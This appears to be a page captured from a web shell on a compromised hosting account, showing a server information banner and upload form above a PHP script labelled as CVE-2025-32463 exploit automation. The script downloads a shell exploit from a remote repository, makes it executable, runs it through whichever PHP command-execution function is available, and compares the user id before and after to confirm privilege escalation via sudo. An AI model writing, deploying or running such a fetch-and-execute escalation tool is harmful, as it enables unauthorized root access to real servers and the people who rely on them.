| Server IP : 68.178.164.50 / Your IP : 216.73.216.142 Web Server : Apache System : Linux 50.164.178.68.host.secureserver.net 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64 User : rathinambschool ( 1053) PHP Version : 8.2.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/rathinambschool/www/ |
Upload File : |
<?php
// CVE-2025-32463 Exploit Automation - Web Version
// Authorized penetration testing use only
header('Content-Type: text/html; charset=utf-8');
echo '<pre>';
echo "[*] Starting CVE-2025-32463 exploit automation\n";
echo "[*] Timestamp: " . date('Y-m-d H:i:s') . "\n\n";
// Check disabled functions
$disabled = ini_get('disable_functions');
echo "[*] Disabled functions: $disabled\n\n";
// Download exploit.sh
$url = "https://raw.githubusercontent.com/kh4sh3i/CVE-2025-32463/refs/heads/main/exploit.sh";
echo "[*] Downloading exploit.sh from $url\n";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
$exploitContent = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($exploitContent === false || $httpCode !== 200) {
die("[-] Failed to download exploit.sh (HTTP $httpCode)\n");
}
// Save exploit.sh
if (file_put_contents("exploit.sh", $exploitContent) === false) {
die("[-] Failed to save exploit.sh\n");
}
echo "[+] exploit.sh saved successfully (" . strlen($exploitContent) . " bytes)\n";
// Make executable
echo "[*] Making exploit.sh executable\n";
chmod("exploit.sh", 0755);
echo "[+] exploit.sh is now executable\n";
// Function to execute command with better output capture
function runCmd($cmd) {
echo "[>] Running: $cmd\n";
// Try different methods
$output = '';
$return_var = 0;
if (function_exists('exec')) {
exec($cmd . ' 2>&1', $output_array, $return_var);
$output = implode("\n", $output_array);
} elseif (function_exists('system')) {
ob_start();
system($cmd . ' 2>&1', $return_var);
$output = ob_get_clean();
} elseif (function_exists('passthru')) {
ob_start();
passthru($cmd . ' 2>&1', $return_var);
$output = ob_get_clean();
} elseif (function_exists('shell_exec')) {
$output = shell_exec($cmd . ' 2>&1');
$return_var = 0;
} else {
return "[-] No command execution function available\n";
}
if ($return_var !== 0) {
$output .= "\n[exit code: $return_var]";
}
return $output;
}
// Show current ID
echo "\n========================================\n";
echo "[*] Current user ID (before exploit):\n";
$output = runCmd("id");
echo $output ? $output : "[no output]";
echo "\n========================================\n\n";
// Check sudo version
echo "[*] Checking sudo version:\n";
$sudoVer = runCmd("sudo --version 2>&1 | head -2");
echo $sudoVer ? $sudoVer : "[sudo not found or not working]";
echo "\n\n";
// Check if gcc is available
echo "[*] Checking gcc availability:\n";
$gccCheck = runCmd("which gcc");
echo $gccCheck ? $gccCheck : "[gcc not found]";
echo "\n\n";
// Execute exploit
echo "[*] Executing exploit.sh...\n";
echo "[*] This may take a few seconds...\n\n";
echo "----- EXPLOIT OUTPUT -----\n";
// Read and display the script content first for debugging
echo "[*] Exploit script content:\n";
echo runCmd("cat exploit.sh");
echo "\n\n";
// Run the actual exploit
$output = runCmd("./exploit.sh");
echo $output ? $output : "[no output from exploit]";
echo "\n----- END EXPLOIT OUTPUT -----\n";
// Show ID after exploit
echo "\n========================================\n";
echo "[*] User ID after exploit execution:\n";
$output = runCmd("id");
echo $output ? $output : "[no output]";
echo "========================================\n";
echo "\n[*] Exploit automation complete\n";
echo '</pre>';
?>